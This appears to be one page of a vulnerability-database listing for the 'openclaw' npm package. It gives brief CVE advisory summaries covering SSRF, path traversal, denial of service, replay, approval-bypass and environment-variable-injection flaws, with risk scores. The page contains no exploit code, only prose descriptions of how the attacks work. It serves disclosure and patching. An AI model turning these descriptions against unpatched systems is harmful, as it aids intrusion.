VYPR

Openclaw

by OpenClaw

npm: openclaw

Source repositories

CVEs (537)

  • CVE-2026-41399HigApr 28, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for legitimate clients.

  • CVE-2026-41395HigApr 28, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay cache detection and trigger…

  • CVE-2026-41302HigApr 21, 2026
    risk 0.42cvss 7.6epss 0.00

    OpenClaw before 2026.3.31 contains a server-side request forgery vulnerability in the marketplace plugin download functionality that allows remote attackers to make arbitrary network requests. Attackers can exploit unguarded fetch() calls to access internal resources or interact…

  • CVE-2026-41297HigApr 21, 2026
    risk 0.42cvss 7.6epss 0.00

    OpenClaw before 2026.3.31 contains a server-side request forgery vulnerability in the marketplace plugin download functionality that allows attackers to access internal resources by following unvalidated redirects. The marketplace.ts module fails to restrict redirect…

  • CVE-2026-35650HigApr 10, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed override keys that slip through…

  • CVE-2026-34426HigApr 2, 2026
    risk 0.42cvss 7.6epss 0.00

    OpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject attacker-controlled environment variables into execution without approval…

  • CVE-2026-32988HigMar 31, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw before 2026.3.11 contains a sandbox boundary bypass vulnerability in fs-bridge staged writes where temporary file creation and population are not pinned to a verified parent directory. Attackers can exploit a race condition in parent-path alias changes to write…

  • CVE-2026-32982HigMar 31, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw before 2026.3.13 contains an information disclosure vulnerability in the fetchRemoteMedia function that exposes Telegram bot tokens in error messages. When media downloads fail, the original Telegram file URLs containing bot tokens are embedded in MediaFetchError…

  • CVE-2026-32980HigMar 29, 2026
    risk 0.42cvss 7.5epss 0.01

    OpenClaw before 2026.3.13 reads and buffers Telegram webhook request bodies before validating the x-telegram-bot-api-secret-token header, allowing unauthenticated attackers to exhaust server resources. Attackers can send POST requests to the webhook endpoint to force memory…

  • CVE-2026-32846HigMar 26, 2026
    risk 0.42cvss 7.5epss 0.01

    OpenClaw before 2026.3.28 contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the…

  • CVE-2026-32062HigMar 11, 2026
    risk 0.42cvss 7.5epss 0.00

    OpenClaw versions 2026.2.21-2 up to, but not including, 2026.2.22, and @openclaw/voice-call versions 2026.2.21 up to, but not including, 2026.2.22 accept media-stream WebSocket upgrades before stream validation, allowing unauthenticated clients to establish connections. Remote…

  • CVE-2026-3690HigApr 11, 2026
    risk 0.41cvss 7.4epss 0.01

    OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of…

  • CVE-2026-35629HigApr 9, 2026
    risk 0.41cvss 7.4epss 0.00

    OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to…

  • CVE-2026-32019HigMar 19, 2026
    risk 0.41cvss 7.4epss 0.00

    OpenClaw versions prior to 2026.2.22 contain incomplete IPv4 special-use range validation in the isPrivateIpv4() function, allowing requests to RFC-reserved ranges to bypass SSRF policy checks. Attackers with network reachability to special-use IPv4 ranges can exploit web_fetch…

  • CVE-2026-53816HigJun 11, 2026
    risk 0.40cvss 7.2epss 0.00

    OpenClaw before 2026.5.18 contains an insufficient provenance validation vulnerability in node event handling that allows paired nodes to forge exec lifecycle events without system.run authorization. A malicious or compromised paired node can send crafted node.event messages to…

  • CVE-2026-8305HigMay 11, 2026
    risk 0.40cvss 7.3epss 0.01

    A vulnerability was detected in OpenClaw up to 2026.1.24. The impacted element is the function handleBlueBubblesWebhookRequest of the file extensions/bluebubbles/src/monitor.ts of the component bluebubbles Webhook. Performing a manipulation results in improper authentication. It…

  • CVE-2026-44995HigMay 11, 2026
    risk 0.40cvss 7.3epss 0.00

    OpenClaw before 2026.4.20 contains an improper environment variable validation vulnerability in MCP stdio server configuration that allows attackers to execute arbitrary code. Malicious workspace configurations can pass dangerous startup variables like NODE_OPTIONS, LD_PRELOAD,…

  • CVE-2026-43531HigMay 5, 2026
    risk 0.40cvss 7.3epss 0.00

    OpenClaw before 2026.4.9 contains an environment variable injection vulnerability allowing malicious workspace .env files to set runtime-control variables. Attackers can inject variables affecting update sources, gateway URLs, ClawHub resolution, and browser executable paths to…

  • CVE-2026-41390HigApr 28, 2026
    risk 0.40cvss 7.3epss 0.00

    OpenClaw before 2026.3.28 contains an exec allowlist bypass vulnerability where allow-always persistence fails to unwrap /usr/bin/script and similar wrappers before storing trust decisions. Attackers can obtain user approval for one wrapped command to persist trust for wrapper…

  • CVE-2026-41380HigApr 28, 2026
    risk 0.40cvss 7.3epss 0.00

    OpenClaw before 2026.3.28 contains an execution approval vulnerability in exec-approvals-allowlist.ts that allows allow-always persistence to trust wrapper carrier executables instead of invoked targets. Attackers can exploit positional carrier executable routing through…

Page 7 of 27